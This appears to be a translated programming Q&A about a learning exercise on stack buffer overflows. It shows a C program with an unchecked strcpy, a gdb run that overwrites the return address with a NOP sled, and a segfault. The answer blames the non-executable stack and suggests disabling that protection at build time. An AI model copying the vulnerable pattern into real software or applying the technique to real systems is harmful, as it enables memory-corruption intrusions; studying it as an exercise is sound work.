有人知道为什么我会通过执行0x90

Question

我通过执行0x90得到了一个分段错误错误，为什么会发生这种情况呢？

这是我的C代码：

#include<stdio.h>
#include<string.h>
#include<unistd.h>
#include<stdlib.h>
#include<stdint.h>
char * buffer;


int64_t * startPtr;
int64_t * endPtr;
int64_t * exploitAddress;

int test()
{

    printf("test\n");
    return 0;
}

void main(int argc, char ** argv)
{
    char buffer[512];
    startPtr = (int64_t *) &test;
    printf("funcPtr : \n %p\n", startPtr);
    printf("bufferPtr : \n %p\n", buffer);
    strcpy(buffer, argv[1]);
    printf("string : \n%s\n", buffer);

}

这就是我在gdb中所做的事情：

(gdb) run `python -c 'print "\x90" * (256+8) + "\x90"*(256) + "\x30\xd8\xff\xff\xff\x7f\x00\x00"'`
Starting program: /home/nikolaij/Schreibtisch/BufferOverflow/OpenGL `python -c 'print "\x90" * (256+8) + "\x90"*(256) + "\x30\xd8\xff\xff\xff\x7f\x00\x00"'`
funcPtr : 
 0x4005b6
bufferPtr : 
 0x7fffffffd800
string : 
����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������0����

Program received signal SIGSEGV, Segmentation fault.
0x00007fffffffd830 in ?? ()
(gdb) info reg
rax            0x219    537
rbx            0x0  0
rcx            0x7ffffde7   2147483111
rdx            0x7ffff7dd3780   140737351858048
rsi            0x1  1
rdi            0x1  1
rbp            0x9090909090909090   0x9090909090909090
rsp            0x7fffffffda10   0x7fffffffda10
r8             0x0  0
r9             0x219    537
r10            0x20e    526
r11            0x246    582
r12            0x4004c0 4195520
r13            0x7fffffffdae0   140737488345824
r14            0x0  0
r15            0x0  0
rip            0x7fffffffd830   0x7fffffffd830
eflags         0x10206  [ PF IF RF ]
cs             0x33 51
---Type <return> to continue, or q <return> to quit---
ss             0x2b 43
ds             0x0  0
es             0x0  0
fs             0x0  0
gs             0x0  0
(gdb) x /64xb 0x00007fffffffd830
0x7fffffffd830: 0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0x7fffffffd838: 0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0x7fffffffd840: 0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0x7fffffffd848: 0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0x7fffffffd850: 0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0x7fffffffd858: 0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0x7fffffffd860: 0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0x7fffffffd868: 0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
(gdb) 

注意：

0x7fffffffd830: 0x90
rip            0x7fffffffd830   0x7fffffffd830

编译：

gcc test.c -fno-stack-protector -o OpenGL

程序名称＆＃34; OpenGL＆＃34;与该计划无关。它来自一个较旧的程序。

感谢您的帮助。

Answer 1

您需要使用-Wl,-z,execstack进行构建。

大多数现代系统都防止将可执行代码放在堆栈上，以防止您尝试实施的堆栈溢出攻击。

Documentation